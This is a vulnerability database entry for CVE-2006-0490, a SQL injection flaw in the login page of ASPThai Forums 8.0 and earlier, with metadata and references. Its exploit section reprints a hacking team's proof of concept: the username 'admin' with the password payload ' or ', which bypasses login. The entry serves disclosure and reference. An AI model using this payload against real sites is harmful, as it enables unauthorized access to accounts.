ASPThai Forums Login.ASP SQL Injection Vulnerability

Vulnerability ID: 1196213    Vulnerability type: SQL injection
Published: 2006-01-31    Updated: 2006-02-01
CVE ID: CVE-2006-0490    CNNVD-ID: CNNVD-200601-381
Affected platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006010067
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-381
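|Vulnerability details
A SQL injection vulnerability exists in login.asp in ASPThai.Net ASPThai Forums 8.0 and earlier. A remote attacker can execute arbitrary SQL commands and bypass login authentication via the password field.
|Exploit (EXP)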
ASPThai Forums Version 8.0 & Lower Sql Injection Vulnerability
ASPThai is Product of www.ASPThai.net and Made in Thailand
author : code.shell , <code.shell (at) yahoo (dot) com>

########################################################
Target:

http://www.example.com/[Forum target]/login.asp

username: admin

password: ' or '

########################################################

ASPThai Forums ver 8.5 & Uppers Not vulnerable!

----------------------------------------------------
Web Site: Www.imanOnline.com
E-Mail: info (at) imanOnline (dot) com
----------------------------------------------------
 Emperor Hacking Team

We Are: iM4n - shell.code - Sun.solaris - R$P
----------------------------------------------------
|References

Source: XF
Name: aspthai-login-sql-injection(24359)
Link: http://xforce.iss.net/xforce/xfdb/24359
Source: BID
Name: 16404
Link: http://www.securityfocus.com/bid/16404
Source: OSVDB
Name: 22790
Link: http://www.osvdb.org/22790
Source: VUPEN
Name: ADV-2006-0372
Link: http://www.frsirt.com/english/advisories/2006/0372
Source: SECTRACK
Name: 1015548
Link: http://securitytracker.com/id?1015548
Source: SREASON
Name: 381
Link: http://securityreason.com/securityalert/381
Source: SECUNIA
Name: 18636
Link: http://secunia.com/advisories/18636
Source: BUGTRAQ
Name: 20060127hello
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=113837847503661&w=2